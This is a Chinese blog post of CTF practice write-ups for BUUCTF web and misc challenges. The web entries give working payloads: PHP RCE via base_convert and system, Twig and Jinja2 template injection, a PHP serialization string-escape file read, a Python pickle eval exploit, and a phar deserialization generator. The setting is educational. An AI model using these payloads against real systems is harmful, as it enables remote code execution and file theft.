BUUCTF-刷题记录-4

最新推荐文章于 2024-07-23 22:15:26 发布
最新推荐文章于 2024-07-23 22:15:26 发布
阅读量857 收藏 1
点赞数
分类专栏: BUUCTF刷题记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45628145/article/details/108869539
版权

WEB

[CISCN 2019 初赛]Love Math

这题主要是通过给的那些函数来进行一个RCE,其中值得注意的就是进制转换函数base_convert()dechex()了,我们的主要目的是造出来一个_GET,然后再通过这个来传入参数,进行RCE。而通过base_convert()函数可以进行任意进制间的一个转换,也就是可以构造出来任意的字符串,这里可以先通过一个base_convert()函数造出来一个hex2bin,然后通过dechex()函数把十进制转换成16进制,然后通过hex2bin()这个函数把该十六进制字符串转换成_GET,然后通过白名单中一些比较短的字符串来传递参数,例如picos,最终构造为

?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){cos})&pi=system&cos=cat /flag

得到flag

[BJDCTF2020]Cookie is so stable

在flag栏里面输入{{1+1}},返回2,确认为SSTI漏洞,注入点也就是为存于Cookie中的user值。

然后输入{{7*'7'}}返回49,确认为Twig模板,然后直接打即可,payload如下

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}

[WesternCTF2018]shrine

给了源码,输入/shrine/{{7*'7'}}返回7777777,却认为Jinja2的模板,但是不能直接打了,因为过滤掉了configself

import flask
import os

app = flask.Flask(__name__)
app.config['FLAG'] = os.environ.pop('FLAG')
#这里告诉我们flag在config里面

@app.route('/')
def index():
    return open(__file__).read()

@app.route('/shrine/<path:shrine>')
def shrine(shrine):
    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s
    return flask.render_template_string(safe_jinja(shrine))

if __name__ == '__main__':
    app.run(debug=True)

当我们需要获取配置信息时,需要获得current_app这样的全局变量,即构造如下payload即可获得flag

/shrine/{{url_for.__globals__['current_app'].config}}
/shrine/{{get_flashed_messages.__globals__['current_app'].config}}

[安洵杯 2019]easy_serialize_php

<?php
$function = @$_GET['f'];

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
    //过滤掉一些关键字,并替换为空,可造成字符串逃逸
}

if($_SESSION){
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);
//存在变量覆盖

if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){ 
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));
var_dump($serialize_info);

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}

首先是根据提示访问phpinfo发现了

所以要想办法读取这个文件,读取文件的话只能通过img_path来传入路径,可惜如果是我们传入的img_path,除了会被base_enconde一次,还会被sha1一次,导致最后读取的时候无法解密,文件读取不出来。但是这题做了一个过滤,把一些关键词过滤为空,这样就造成了字符串长度逃逸,而且存在一个变量覆盖,我们可以通过POST方法重新传入一个_SESSION["user"] = 'flagphphphhp'这样类似的东西,使其造成过滤,造成字符串长度的一个逃逸,同时传入_SESSION[function]为我们自己构造的值,也同时传入function=show_image,从而进行一个反序列化字符串长度的逃逸以及一个变量覆盖,读取这个文件,payload如下,post以下数据

_SESSION[user]=phpphpphpphpphpphpphpphp&_SESSION[function]=a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:1:"a";s:1:"a";}&function=show_image

得到提示

替换一下base64的内容即可,同时这个base64以后的长度也是20,所以不用做更改,最后读取flag的payload:

_SESSION[user]=phpphpphpphpphpphpphpphp&_SESSION[function]=a";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";s:1:"a";s:1:"a";}&function=show_image

[CISCN2019 华北赛区 Day1 Web2]ikun

看到这里说一定要买到6级号

而且这里有一个商品页面的查询,所以写个脚本跑一下,看看第几页有6级号买

import requests
from time import sleep
url="http://0928aa12-db7b-42f6-975e-cf52993ad3c6.node3.buuoj.cn/shop?page="


for i in range(0,500):
    res = requests.get(url + str(i))
    if 'lv6.png' in res.text:
        print(i)
        break
    sleep(0.3)
    print(i)

得到结果,180页,不过太贵了,买不起,但是抓包发现,折扣是咱们传过去的,直接修改即可,购买成功之后进入这样的一个页面。

然后发现cookie是jwt的,但是没有告诉我们SECRET_KEY,所以用c-jwt-cracker这个工具爆破一下看看,得到了SECRET_KEY1KUN

然后把cookie伪造成admin,不知道怎么回事,工具一直报错,然后使用jwt的在线网站伪造的

发现了源码的路径

Admin.py中发现一处pickle反序列漏洞的地方

使用魔术方法__reduce__来进行解题

import pickle
import urllib

class payload(object):
    def __reduce__(self):
       # return (eval,("__import__('os').popen('ls').read()",))
       return (eval, ("open('/flag.txt','r').read()",))

a = pickle.dumps(payload())
a = urllib.quote(a)
print a

将生成的数据post过去即可获得flag,但是没搞懂的是为什么要传入这个_xsrf的参数及其的值

[CISCN2019 华北赛区 Day1 Web1]Dropbox

下载文件的功能点存在一个任意文件下载漏洞,通过这个点来读取程序的php源码

class User {
    public $db;
    public function __destruct() {
        $this->db->close();
    }
}

class File {
    public $filename;
    public function close() {
        return file_get_contents($this->filename);
    }
}

class.phpFile类中存在一个可以读取文件的close()方法,在User类中的__destruct()方法中调用了close()方法,如果我们想要调用File->close(),我们就要让User类的$db = 'File'
通过把FileList类的$files赋值为File(),然后又把File类的$filename赋值为flag.txt,把User类的$db赋值为FileList类,然后在进行文件删除的时候,php找不到FileList类的close()方法,从而调用__call魔术方法,找到位于File类中的close()方法,从而调用,输出flag。注意上传文件的时候修改文件名为phar://1.png

//生成phar的代码
<?php
	class User
	{
		public $db;
	}
	class FileList
	{
		private $files;
		public function __construct()
		{
			$this->files=array(new File());
		}
	}
	class File
	{
		public $filename='/flag.txt';
	}

	$a = new FileList();
	$b = new User();
    $b -> db = $a;
    
    $phar = new Phar('1.phar');
    $phar->startBuffering();
    $phar->addFromString('1.txt', 'text');
    $phar->setStub('<?php __HALT_COMPILER(); ? >');
    $phar->setMetadata($b);
    $phar->stopBuffering();
 ?>

MISC

寂静之城

一道社工题,不过由于时代久远,东西已经被删的差不多了,最后从其他人的wp中找到flag

flag{31010419920831481363542021127}

我这算社工吗?哈哈,应该算py。

秋风瑟瑟...
关注
专栏目录
buuctf-[CISCN2019 华北赛区 Day1 Web2]ikun
qaq517384的博客
10-06 598
[CISCN2019 华北赛区 Day1 Web2]ikun 打开题目是一个kunkun和一句买到lv6的话 先注册一个登录栞栞,没有东西,应该就是要买lv6了 点击下一页url加上了?page=2 一开始循环里是url=url+str(i)然后就一直报500code,给自己一拳 lv6每页都有所以要加.png 结果是page=181 import requests url="http://93b9fe83-ed26-4bbe-b6af-b0fd164e9ab5.node4.buuoj.cn:81/sh
buuctf misc部分wp
a3uRa的一个窝
08-29 1万+
文章目录大白 | png图片改高度基础破解 | archpr爆破你竟然赶我走 | 打开ningen | easyLSB | ssrar | archpr爆破qr | 二维码扫描乌镇峰会种图 | 记事本打开wireshark | 导出http对象文件中的秘密 | 右键属性假如给我三天光明来首歌吧 | 摩尔斯密码镜子里面的世界 | ss爱因斯坦小明的保险箱FLAGeasycap被嗅探的流量梅花香之苦寒...
一天一道ctf 第29天
scrawman的博客
07-11 131
鸽了好久 [BJDCTF2020]Cookie is so stable
buuctf之[SCTF2019]Flag Shop(ruby模块注入)
最新发布
dalaojiaoweb的博客
07-23 432
我们要通过<%=%>进行模板注入,弹窗代码{params[:name][0,7]}使我们只能在模块中再进行2个字符的输入,也就是说我们不能够直接输入。为什么还需要一个SECRET参数加入呢,是为了可以搜索SECRET参数内容,然后使 <%=$'%>返回最后一次匹配的字符串是我们的密钥。可以猜测我们只需要将jkl的值改写的超过买flag的值即可。可以看到我们的密钥得到了,然后进行jkl的修改使其可以达到买flag的标准。填入我们的修改后的值。可以看到cookie是标准的三段式,可以猜测到是JWT,我们在。
python 重定向 ctf_BUUCTF-web ikun(Python 反序列化)
weixin_39796116的博客
12-10 311
正如本题所说,脑洞有点大。考点还很多,不过最核心的还是python的pickle反序列化漏洞题目中暗示了要6级号,找了很多页都没看到,于是写了脚本在第180页有6级号,但是价格出奇的高,明显买不起。bp抓包发现有疑似折扣的参数,把值改低后提交,重定向到了后台页面,但是需要admin才行。这时一早就发现的JWT便派上了用场。在https://jwt.io/在线解析jwt。data段有我们的用户名,可...
2016xctf一道ctf题目
热门推荐
一个码农的笔记
09-22 3万+
首先是index.php: <?php $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"]; if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){ echo "hello admin!"; if(preg_
BUUCTF-pwn刷题记录(22-7-30更新)
Morphy_Amo的博客
03-04 4358
BUUCTF刷题记录
BUUCTF-CRYPTO 刷题记录(一)
lysecl‘s blog
06-18 1667
buuctf crypto部分刷题记录,此文是第一部分。后续会继续更新。 0x1 救世捷径 其实是算法题,利用Dijkstra算法即可求出 0x2 [NCTF2019]childRSA 题目 def getPrime(bits): while True: n = 2 while n.bit_length() < bits: n *= choice(primes) if isPrime(n + 1):
BUUCTF-PWN刷题记录-4
weixin_44145820的博客
04-10 1113
目录hitcontraining_secretgarden hitcontraining_secretgarden 这题需要使用double free size字段的高四位可以不为0
BUUCTF-PWN刷题记录-21
weixin_44145820的博客
05-15 712
目录wdb_2018_1st_babyheap(unlink, UAF) wdb_2018_1st_babyheap(unlink, UAF) add的大小固定为0x20 edit机会只有三次 指针悬挂 利用思路如下: 进行几次添加 add(0, (p64(0)+p64(0x31))*2) add(1, 'aaa\n') add(2, 'aaa\n') add(3, 'aaa\n') add(4, '/bin/sh\n') 删除0和1,再删除一次0,此时show(0)能泄露出heap的地址
BUUCTF-Crypto刷题记录
Georgeiweb的博客
10-18 1708
BUUCTF-Crypto刷题记录 签到-y1ng 题目:welcome to BJDCTF 1079822948 QkpEe1czbGMwbWVfVDBfQkpEQ1RGfQ== 解题思路:密文后边有等号,很有可能是base 64所以用工具尝试 所以答案为flag{W3lc0me_T0_BJDCTF} password 题目:姓名:张三 生日:19900315 key格式为key{xxxxxxxxxx} 解题思路:没有什么可以看出的标志,所以尝试着,姓名缩写加生日 所以答案刚好为:flag{zs1990
[GUET-CTF2019]zips
zip471642048的博客
06-23 653
题目地址 : https://buuoj.cn/challenges#[GUET-CTF2019]zips 解压flag.zip 直接获得flag
buuctf misc 百里挑一
zip471642048的博客
06-27 2023
题目地址 : https://buuoj.cn/challenges#%E7%99%BE%E9%87%8C%E6%8C%91%E4%B8%80 然后用exiftool查找flag,只找到了一半flag
CTF技巧_Web——PHP特性_反序列化逃逸
Ho1aAs‘s Blog
11-01 415
文章目录一、简述二、PHP源码三、方法及原理 一、简述 目的是通过反序列化逃逸,传入我们想要的变量值,从而绕过某些方法,例如类的__wakeup 反序列化逃逸的本质是传入序列化串的后半部分使得序列化串过早闭合,这样就可以传入参数 二、PHP源码 <?php function change($str){ return str_replace("t","tt",$str); } $source = 'str_replace("t","tt",$str);<br/>$input = $
BUUCTF-WEB-[CISCN2019 华北赛区 Day1 Web2]ikun
weixin_43345082的博客
07-30 8586
当时没做出来,大佬复现了环境就做一波 题目 第一步提示我们要找到lv6 写个脚本找一下 import requests url="http://web44.buuoj.cn/shop?page=" for i in range(0,2000): r=requests.get(url+str(i)) if 'lv6.png' in r.text: print (i) break ...
CTFSHOW 反序列化篇
羽的博客
12-11 1万+
web254 没搞懂和反序列化有啥关系,直接传username=xxxxxx&password=xxxxxx出flag web255 请求包内容如下 首先get传的username和password都是xxxxxx 因为源码里面 $user = unserialize($_COOKIE['user']); $user->login($username,$password); 就是是说我们需要让反序列后的结果是ctfShowUser的实例化对象。又因为只有$this->isVip是tr
搭建一个ctf_由一道CTF赛题分析Twig SSTI利用方式
weixin_39620273的博客
11-22 664
前言在上周末刚刚结束的安恒6月赛DASCTF中,有一道web题涉及 Twig 模板注入,而两个月前的 volgactf 也涉及了同样的内容,但所使用的版本不同。本文通过CTF题的解法来分析 Twig 模板注入的利用方式Subscribe@DASCTF这是一道白盒代码审计题,给出的源码如下(作者注:本题目是基于Twig 1.x版本)phprequire_once "mail/smtp.cl...
BUUCTF:[HBNIS2018]caesar
m0_64083304的博客
01-17 507
题目来源:https://buuoj.cn/challenges#[HBNIS2018]caesar
[安洵杯 2019]easy_serialize_php--序列化绕过,extract()函数。
cainiao17441898的博客
06-06 355
解题: 打开源码: <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img); } if($_SESSION){ unset($_SESS
buuctf-强网杯2019随便注
09-03
buuctf-强网杯2019随便注是一场2019年强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与注入漏洞相关的题目。 注入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中注入恶意代码来获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值